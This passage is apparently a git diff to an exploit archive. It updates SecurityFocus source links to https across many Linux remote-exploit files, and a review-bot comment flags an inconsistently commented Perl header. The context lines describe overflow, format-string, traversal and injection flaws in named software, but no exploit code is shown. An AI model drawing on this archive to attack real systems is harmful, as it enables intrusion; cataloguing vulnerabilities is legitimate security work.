conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'. 
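Review bot: The 23771.pl hunk leaves `source: https://www.securityfocus.com/bid/9772/info` as an uncommented first line of a file with mode 100755, while the 23772.c hunk for the same BID gets `// source:`. The comment-prefix fix is applied to the .c files only, so the Perl file still starts with a line that is neither a shebang nor a comment. Suggest `# source: ...` here, with the description lines below it commented the same way, so that the two files for BID 9772 are handled consistently.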
diff --git a/exploits/linux/remote/23777.txt b/exploits/linux/remote/23777.txt index 5f578c958..c992576d4 100644 --- a/exploits/linux/remote/23777.txt +++ b/exploits/linux/remote/23777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9778/info +source: https://www.securityfocus.com/bid/9778/info It has been reported that Squid Proxy may be prone to an unauthorized access vulnerability that may allow remote users to bypass access controls resulting in unauthorized access to attacker-specified resources. The vulnerability presents itself when a URI that is designed to access a specific location with a supplied username, contains '%00' characters. This sequence may be placed as part of the username value prior to the @ symbol in the malicious URI. diff --git a/exploits/linux/remote/23794.txt b/exploits/linux/remote/23794.txt index 25e794a80..14cc2612b 100644 --- a/exploits/linux/remote/23794.txt +++ b/exploits/linux/remote/23794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9817/info +source: https://www.securityfocus.com/bid/9817/info It has been reported that PWebServer is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied URI requests. diff --git a/exploits/linux/remote/23801.txt b/exploits/linux/remote/23801.txt index 4ebe27288..2869bed88 100644 --- a/exploits/linux/remote/23801.txt +++ b/exploits/linux/remote/23801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9846/info +source: https://www.securityfocus.com/bid/9846/info It has been reported that GNU MyProxy may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/linux/remote/23802.txt b/exploits/linux/remote/23802.txt index 2fca89962..207e24a00 100644 --- a/exploits/linux/remote/23802.txt 
+++ b/exploits/linux/remote/23802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9847/info +source: https://www.securityfocus.com/bid/9847/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. A successful cross-site scripting attack may make it possible for an attacker to create a malicious link to a vulnerable site that includes hostile HTML and script code. This code may be rendered in the browser of a victim user who visits the malicious link and this will occur in the security context of the site hosting the software. The directory traversal vulnerability may allow a malicious user to request files outside of the web-server root directory with directory traversal strings such as '../'. diff --git a/exploits/linux/remote/23803.txt b/exploits/linux/remote/23803.txt index 5054f412d..e6a0a352f 100644 --- a/exploits/linux/remote/23803.txt +++ b/exploits/linux/remote/23803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9847/info +source: https://www.securityfocus.com/bid/9847/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. A successful cross-site scripting attack may make it possible for an attacker to create a malicious link to a vulnerable site that includes hostile HTML and script code. This code may be rendered in the browser of a victim user who visits the malicious link and this will occur in the security context of the site hosting the software. The directory traversal vulnerability may allow a malicious user to request files outside of the web-server root directory with directory traversal strings such as '../'. diff --git a/exploits/linux/remote/23811.c b/exploits/linux/remote/23811.c index 8f54945af..07b3e517c 100644 --- a/exploits/linux/remote/23811.c +++ b/exploits/linux/remote/23811.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9871/info +// source: https://www.securityfocus.com/bid/9871/info It has been reported that Mathopd is prone to a remote buffer overflow vulnerability. The issue arises due to a failure to check the bounds of a buffer storing user-supplied input. diff --git a/exploits/linux/remote/23848.txt b/exploits/linux/remote/23848.txt index cdaa7b929..f3e9c58e9 100644 --- a/exploits/linux/remote/23848.txt +++ b/exploits/linux/remote/23848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9919/info +source: https://www.securityfocus.com/bid/9919/info Reportedly SquidGuard is prone to a remote NULL URL character unauthorized access vulnerability. This issue is due to a failure of the application to properly filter out invalid URIs. diff --git a/exploits/linux/remote/23864.txt b/exploits/linux/remote/23864.txt index a24bef48c..909726608 100644 --- a/exploits/linux/remote/23864.txt +++ b/exploits/linux/remote/23864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9937/info +source: https://www.securityfocus.com/bid/9937/info XWeb is reportedly prone to directory traversal attacks. Remote attackers may exploit this issue to gain access to sensitive files outside of the server root. This would occur in the context of the server, i.e.: any files the server could access would also be accessible to the attacker. diff --git a/exploits/linux/remote/23881.txt b/exploits/linux/remote/23881.txt index 709a55018..6b322e114 100644 --- a/exploits/linux/remote/23881.txt +++ b/exploits/linux/remote/23881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9974/info +source: https://www.securityfocus.com/bid/9974/info Multiple locally and remotely exploitable buffer overrun and format strings were reported in emil. This could permit execution of arbitrary code in the context of the software. diff --git a/exploits/linux/remote/23936.pl b/exploits/linux/remote/23936.pl index b593ef030..5b0d5303c 100755 
--- a/exploits/linux/remote/23936.pl +++ b/exploits/linux/remote/23936.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10085/info +source: https://www.securityfocus.com/bid/10085/info LCDproc Server (LCDd) has been reported to be prone to multiple remote vulnerabilities. diff --git a/exploits/linux/remote/24038.txt b/exploits/linux/remote/24038.txt index 0ef4e0273..85c389fcc 100644 --- a/exploits/linux/remote/24038.txt +++ b/exploits/linux/remote/24038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10193/info +source: https://www.securityfocus.com/bid/10193/info It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files. diff --git a/exploits/linux/remote/24079.c b/exploits/linux/remote/24079.c index ec3c046cc..cced1ef02 100644 --- a/exploits/linux/remote/24079.c +++ b/exploits/linux/remote/24079.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10267/info +// source: https://www.securityfocus.com/bid/10267/info APSIS Pound has been found to be prone to a remote format string vulnerability. The problem presents itself when Pound handles certain requests containing embedded format string specifiers. diff --git a/exploits/linux/remote/24093.c b/exploits/linux/remote/24093.c index e10d256d4..62230a50e 100644 --- a/exploits/linux/remote/24093.c +++ b/exploits/linux/remote/24093.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10290/info +// source: https://www.securityfocus.com/bid/10290/info Exim has been reported prone to a remotely exploitable stack-based buffer overrun vulnerability. diff --git a/exploits/linux/remote/24105.txt b/exploits/linux/remote/24105.txt index 419a5a47a..b97b35cf9 100644 --- a/exploits/linux/remote/24105.txt +++ b/exploits/linux/remote/24105.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10315/info +source: https://www.securityfocus.com/bid/10315/info Squid proxy has been reported to be affected by an Internet access control bypass vulnerability. This issue is caused by a failure of the application to properly handle access controls when evaluating malformed URI requests. diff --git a/exploits/linux/remote/24106.txt b/exploits/linux/remote/24106.txt index 9f60e6bd1..0accf87b2 100644 --- a/exploits/linux/remote/24106.txt +++ b/exploits/linux/remote/24106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10316/info +source: https://www.securityfocus.com/bid/10316/info A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters. diff --git a/exploits/linux/remote/24120.pl b/exploits/linux/remote/24120.pl index 8cca8f6b3..3e332ac81 100755 --- a/exploits/linux/remote/24120.pl +++ b/exploits/linux/remote/24120.pl @@ -1,4 +1,4 @@ -//source: http://www.securityfocus.com/bid/10354/info +//source: https://www.securityfocus.com/bid/10354/info // //LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files. // diff --git a/exploits/linux/remote/24136.txt b/exploits/linux/remote/24136.txt index b4054b5f4..7c554777f 100644 --- a/exploits/linux/remote/24136.txt +++ b/exploits/linux/remote/24136.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10383/info +source: https://www.securityfocus.com/bid/10383/info It is reported that KDE Konqueror is prone to a URI obfuscation weakness that may hide the true contents of a URI link. The issue occurs when an image is contained within a properly formatted HREF tag. diff --git a/exploits/linux/remote/24160.txt b/exploits/linux/remote/24160.txt index fd575195c..e8d5272ca 100644 --- a/exploits/linux/remote/24160.txt +++ b/exploits/linux/remote/24160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10439/info +source: https://www.securityfocus.com/bid/10439/info SquirrelMail is reported to be prone to an email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/linux/remote/24165.pl b/exploits/linux/remote/24165.pl index 23c3ed059..804606a59 100755 --- a/exploits/linux/remote/24165.pl +++ b/exploits/linux/remote/24165.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10446/info +source: https://www.securityfocus.com/bid/10446/info Firebird is reported prone to a remote buffer-overrun vulnerability. The issue occurs because the application fails to perform sufficient boundary checks when the database server is handling database names. diff --git a/exploits/linux/remote/24179.txt b/exploits/linux/remote/24179.txt index 000e34fed..60487ac96 100644 --- a/exploits/linux/remote/24179.txt +++ b/exploits/linux/remote/24179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10495/info +source: https://www.securityfocus.com/bid/10495/info Roundup is prone to a remote file disclosure vulnerability. A remote user can disclose files on a vulnerable computer by using the /home/@@file/ prefix and '../' directory traversal sequences. diff --git a/exploits/linux/remote/24221.pl b/exploits/linux/remote/24221.pl index ab08d29f5..7ce2df648 100755 --- a/exploits/linux/remote/24221.pl 
+++ b/exploits/linux/remote/24221.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10569/info +source: https://www.securityfocus.com/bid/10569/info It is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions. diff --git a/exploits/linux/remote/24223.py b/exploits/linux/remote/24223.py index 976d6d9a4..4218ee636 100755 --- a/exploits/linux/remote/24223.py +++ b/exploits/linux/remote/24223.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10578/info +source: https://www.securityfocus.com/bid/10578/info It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access. diff --git a/exploits/linux/remote/24259.c b/exploits/linux/remote/24259.c index 61d61b452..ceae9877e 100644 --- a/exploits/linux/remote/24259.c +++ b/exploits/linux/remote/24259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10672/info +// source: https://www.securityfocus.com/bid/10672/info Ethereal 0.10.5 has been released to address multiple vulnerabilities, including an iSNS protocol dissector vulnerability, a SMB protocol dissector vulnerability, and a SNMP protocol dissector vulnerability. These issues are due to a failure of the application to properly handle malformed packets. diff --git a/exploits/linux/remote/24312.html b/exploits/linux/remote/24312.html index 9f574ef52..3ab12d36d 100644 --- a/exploits/linux/remote/24312.html +++ b/exploits/linux/remote/24312.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10796/info +source: https://www.securityfocus.com/bid/10796/info Mozilla and Firefox may permit malicious Web pages to spoof security properties of a trusted site. diff --git a/exploits/linux/remote/24338.c b/exploits/linux/remote/24338.c index d1751594a..eaeacab74 100644 --- a/exploits/linux/remote/24338.c +++ b/exploits/linux/remote/24338.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10833/info +// source: https://www.securityfocus.com/bid/10833/info A buffer overrun vulnerability is reported for Citadel/UX. The problem occurs due to insufficient bounds checking when processing 'USER' command arguments. diff --git a/exploits/linux/remote/24339.c b/exploits/linux/remote/24339.c index 75f2d0335..6f69e6f51 100644 --- a/exploits/linux/remote/24339.c +++ b/exploits/linux/remote/24339.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10833/info +// source: https://www.securityfocus.com/bid/10833/info A buffer overrun vulnerability is reported for Citadel/UX. The problem occurs due to insufficient bounds checking when processing 'USER' command arguments. diff --git a/exploits/linux/remote/24361.c b/exploits/linux/remote/24361.c index 8c60f92b3..3cb0d19c6 100644 --- a/exploits/linux/remote/24361.c +++ b/exploits/linux/remote/24361.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10899/info +// source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. diff --git a/exploits/linux/remote/24622.c b/exploits/linux/remote/24622.c index b11424e4a..64d98eab4 100644 --- a/exploits/linux/remote/24622.c +++ b/exploits/linux/remote/24622.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11233/info +source: https://www.securityfocus.com/bid/11233/info It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer. 
diff --git a/exploits/linux/remote/24669.txt b/exploits/linux/remote/24669.txt index 482355946..551d71bcd 100644 --- a/exploits/linux/remote/24669.txt +++ b/exploits/linux/remote/24669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11357/info +source: https://www.securityfocus.com/bid/11357/info MySQL is reported prone to multiple local vulnerabilities. Exploiting these issues may allow an attacker to bypass security restrictions or cause a denial-of-service condition in the application. diff --git a/exploits/linux/remote/24704.c b/exploits/linux/remote/24704.c index f24847845..98a2b8525 100644 --- a/exploits/linux/remote/24704.c +++ b/exploits/linux/remote/24704.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11526/info +// source: https://www.securityfocus.com/bid/11526/info The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer. diff --git a/exploits/linux/remote/24784.txt b/exploits/linux/remote/24784.txt index 34fb5c459..15435a970 100644 --- a/exploits/linux/remote/24784.txt +++ b/exploits/linux/remote/24784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11771/info +source: https://www.securityfocus.com/bid/11771/info The file command is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly validate string lengths in the affected file prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24794.sh b/exploits/linux/remote/24794.sh index e95ce8048..19bc6ec51 100755 --- a/exploits/linux/remote/24794.sh +++ b/exploits/linux/remote/24794.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11791/info +source: https://www.securityfocus.com/bid/11791/info scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24795.txt b/exploits/linux/remote/24795.txt index af43006b3..950e79d43 100644 --- a/exploits/linux/remote/24795.txt +++ b/exploits/linux/remote/24795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11792/info +source: https://www.securityfocus.com/bid/11792/info rssh is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24801.txt b/exploits/linux/remote/24801.txt index df08a0f89..ed59cdc31 100644 --- a/exploits/linux/remote/24801.txt +++ b/exploits/linux/remote/24801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11827/info +source: https://www.securityfocus.com/bid/11827/info KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers. diff --git a/exploits/linux/remote/24813.pl b/exploits/linux/remote/24813.pl index b032f4896..c6d3ddc96 100755 --- a/exploits/linux/remote/24813.pl +++ b/exploits/linux/remote/24813.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11871/info +source: https://www.securityfocus.com/bid/11871/info Multiple remote vulnerabilities reportedly affect GNU wget. These issues are due to the application's failure to properly sanitize user-supplied input and to properly validate the presence of files before writing to them. The issues include: diff --git a/exploits/linux/remote/24848.txt b/exploits/linux/remote/24848.txt index e2ef1a5e9..5a6a51663 100644 --- a/exploits/linux/remote/24848.txt +++ b/exploits/linux/remote/24848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11957/info +source: https://www.securityfocus.com/bid/11957/info ChBg is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain superuser privileges on a vulnerable computer. diff --git a/exploits/linux/remote/24852.txt b/exploits/linux/remote/24852.txt index 71a6e6572..6f9b00bb9 100644 --- a/exploits/linux/remote/24852.txt +++ b/exploits/linux/remote/24852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11958/info +source: https://www.securityfocus.com/bid/11958/info A remote client-side buffer overflow vulnerability affects mpg123. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24853.c b/exploits/linux/remote/24853.c index fc1453b49..cb9212709 100644 --- a/exploits/linux/remote/24853.c +++ b/exploits/linux/remote/24853.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11962/info +// source: https://www.securityfocus.com/bid/11962/info A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers. diff --git a/exploits/linux/remote/24856.c b/exploits/linux/remote/24856.c index 7734afcd1..e21a1fe7b 100644 --- a/exploits/linux/remote/24856.c +++ b/exploits/linux/remote/24856.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11967/info +// source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed-size memory buffer. diff --git a/exploits/linux/remote/24857.c b/exploits/linux/remote/24857.c index 56b56b2db..b70a4ffc0 100644 --- a/exploits/linux/remote/24857.c +++ b/exploits/linux/remote/24857.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11967/info +// source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed-size memory buffer. diff --git a/exploits/linux/remote/24977.txt b/exploits/linux/remote/24977.txt index c137d6073..fd1a9aa53 100644 --- a/exploits/linux/remote/24977.txt +++ b/exploits/linux/remote/24977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11968/info +source: https://www.securityfocus.com/bid/11968/info CUPS is reported prone to a remote buffer overflow vulnerability. The issue is reported to exist in the 'hpgl-input.c' source file and is because of a lack of sufficient boundary checks performed on data contained in HPGL files. 
diff --git a/exploits/linux/remote/24978.txt b/exploits/linux/remote/24978.txt index 323ace31c..189c59fd8 100644 --- a/exploits/linux/remote/24978.txt +++ b/exploits/linux/remote/24978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11969/info +source: https://www.securityfocus.com/bid/11969/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file. diff --git a/exploits/linux/remote/25005.txt b/exploits/linux/remote/25005.txt index 59da9b572..96b927c0f 100644 --- a/exploits/linux/remote/25005.txt +++ b/exploits/linux/remote/25005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11991/info +source: https://www.securityfocus.com/bid/11991/info NASM is prone to a buffer overflow. This condition is exposed when the application attempts to assemble a source file that contains malformed '%error' preprocessor directive arguments. Since the source file may originate from an external or untrusted source, this vulnerability is considered remote in nature. diff --git a/exploits/linux/remote/25006.txt b/exploits/linux/remote/25006.txt index 08063363e..428085c13 100644 --- a/exploits/linux/remote/25006.txt +++ b/exploits/linux/remote/25006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11994/info +source: https://www.securityfocus.com/bid/11994/info It is reported that rtf2latex2e is susceptible to a stack buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied image data prior to copying it into a fixed-size memory buffer. diff --git a/exploits/linux/remote/25008.txt b/exploits/linux/remote/25008.txt index e1548d84d..0d6f30360 100644 --- a/exploits/linux/remote/25008.txt +++ b/exploits/linux/remote/25008.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11997/info +source: https://www.securityfocus.com/bid/11997/info LinPopUp is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain unauthorized access to a computer in the context of the application. diff --git a/exploits/linux/remote/25010.txt b/exploits/linux/remote/25010.txt index 81fdc1dee..813ea2fcf 100644 --- a/exploits/linux/remote/25010.txt +++ b/exploits/linux/remote/25010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12000/info +source: https://www.securityfocus.com/bid/12000/info o3read is prone to a buffer overflow vulnerability. This issue is exposed when the program parses HTML content during file format conversion. This issue is considered to be remote in nature since it is possible that files may originate from an external or untrusted source. diff --git a/exploits/linux/remote/25015.txt b/exploits/linux/remote/25015.txt index 117d92ac4..6dfa9d44e 100644 --- a/exploits/linux/remote/25015.txt +++ b/exploits/linux/remote/25015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12010/info +source: https://www.securityfocus.com/bid/12010/info Ringtone Tools is reported prone to a remote buffer overflow vulnerability. This issue arises because the application fails to carry out proper boundary checks before copying user-supplied data in to sensitive process buffers. It is reported that this issue can allow an attacker to gain unauthorized access to a computer in the context of the application. diff --git a/exploits/linux/remote/25030.txt b/exploits/linux/remote/25030.txt index b1670a708..4ac7c74bd 100644 --- a/exploits/linux/remote/25030.txt +++ b/exploits/linux/remote/25030.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12030/info +source: https://www.securityfocus.com/bid/12030/info GNU UnRTF is prone to a buffer overflow vulnerability. This issue is exposed when the program converts RTF font table data. Since RTF documents may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25035.txt b/exploits/linux/remote/25035.txt index 5183e937a..35be1de20 100644 --- a/exploits/linux/remote/25035.txt +++ b/exploits/linux/remote/25035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12035/info +source: https://www.securityfocus.com/bid/12035/info PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the application handles a calendar file that contains excessively long lines. Since calendar files may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25036.txt b/exploits/linux/remote/25036.txt index 6fcfad2c4..a6f47fe72 100644 --- a/exploits/linux/remote/25036.txt +++ b/exploits/linux/remote/25036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12036/info +source: https://www.securityfocus.com/bid/12036/info PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the application handles a calendar file that contains excessively long holiday data. Since calendar files may originate from an external or untrusted source, this vulnerability is considered to be remote in nature. diff --git a/exploits/linux/remote/25054.txt b/exploits/linux/remote/25054.txt index 98c164d54..55fa6d51c 100644 --- a/exploits/linux/remote/25054.txt +++ b/exploits/linux/remote/25054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12312/info +source: https://www.securityfocus.com/bid/12312/info Konversation is a freely available IRC client for KDE windows environments on Linux platforms. 
diff --git a/exploits/linux/remote/25080.txt b/exploits/linux/remote/25080.txt index 0965e73d9..8c9fc0752 100644 --- a/exploits/linux/remote/25080.txt +++ b/exploits/linux/remote/25080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12428/info +source: https://www.securityfocus.com/bid/12428/info Newsgrab is reported prone to multiple vulnerabilities. The following individual issues are reported: diff --git a/exploits/linux/remote/25122.txt b/exploits/linux/remote/25122.txt index bc96c8fe2..20cc873fb 100644 --- a/exploits/linux/remote/25122.txt +++ b/exploits/linux/remote/25122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12586/info +source: https://www.securityfocus.com/bid/12586/info It is reported that various ZIP related plugins supplied with the server contain multiple directory traversal vulnerabilities. These issues may allow remote attackers to determine the existence of files on a computer and also disclose arbitrary files. The issues arise due to insufficient sanitization of user-supplied data. diff --git a/exploits/linux/remote/25150.txt b/exploits/linux/remote/25150.txt index b6a7a9527..5910b50d6 100644 --- a/exploits/linux/remote/25150.txt +++ b/exploits/linux/remote/25150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12628/info +source: https://www.securityfocus.com/bid/12628/info A remotely exploitable client-side directory-traversal vulnerability affects Winace unace. The application fails to properly sanitize file and directory names contained within malicious ACE format archives. diff --git a/exploits/linux/remote/25221.txt b/exploits/linux/remote/25221.txt index 4ce183262..900ec8c10 100644 --- a/exploits/linux/remote/25221.txt +++ b/exploits/linux/remote/25221.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12798/info +source: https://www.securityfocus.com/bid/12798/info Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag. diff --git a/exploits/linux/remote/25275.c b/exploits/linux/remote/25275.c index a3507f885..0a8568ff0 100644 --- a/exploits/linux/remote/25275.c +++ b/exploits/linux/remote/25275.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12899/info +// source: https://www.securityfocus.com/bid/12899/info Smail-3 is reported prone to multiple vulnerabilities. These issues can allow a local or remote attacker to execute arbitrary code on a vulnerable computer. A successful attack may lead to a complete compromise. diff --git a/exploits/linux/remote/25321.c b/exploits/linux/remote/25321.c index 5305ea6f3..9fa75b6e6 100644 --- a/exploits/linux/remote/25321.c +++ b/exploits/linux/remote/25321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12947/info +// source: https://www.securityfocus.com/bid/12947/info mtftpd is reported prone to a remote format string vulnerability. diff --git a/exploits/linux/remote/25375.pl b/exploits/linux/remote/25375.pl index 9fc2d67d9..01e4f92f7 100755 --- a/exploits/linux/remote/25375.pl +++ b/exploits/linux/remote/25375.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13085/info +source: https://www.securityfocus.com/bid/13085/info A remote email message content spoofing vulnerability affects KDE KMail. This issue is due to a failure of the application to properly sanitize HTML email messages. diff --git a/exploits/linux/remote/25392.c b/exploits/linux/remote/25392.c index 4ac72e9b8..c5a55d3a2 100644 --- a/exploits/linux/remote/25392.c +++ b/exploits/linux/remote/25392.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13129/info +// source: https://www.securityfocus.com/bid/13129/info It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it. diff --git a/exploits/linux/remote/25526.c b/exploits/linux/remote/25526.c index 4e94305eb..300a1c310 100644 --- a/exploits/linux/remote/25526.c +++ b/exploits/linux/remote/25526.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13347/info +// source: https://www.securityfocus.com/bid/13347/info A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters. diff --git a/exploits/linux/remote/25547.pl b/exploits/linux/remote/25547.pl index 3236b2a3c..eebffd9da 100755 --- a/exploits/linux/remote/25547.pl +++ b/exploits/linux/remote/25547.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13401/info +source: https://www.securityfocus.com/bid/13401/info Convert-UUlib Perl module is prone to a remotely exploitable buffer-overflow vulnerability. diff --git a/exploits/linux/remote/25669.txt b/exploits/linux/remote/25669.txt index ee894b730..5fa817f14 100644 --- a/exploits/linux/remote/25669.txt +++ b/exploits/linux/remote/25669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13642/info +source: https://www.securityfocus.com/bid/13642/info pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission. diff --git a/exploits/linux/remote/25706.cpp b/exploits/linux/remote/25706.cpp index 14ee3929f..9f1a54bfc 100644 
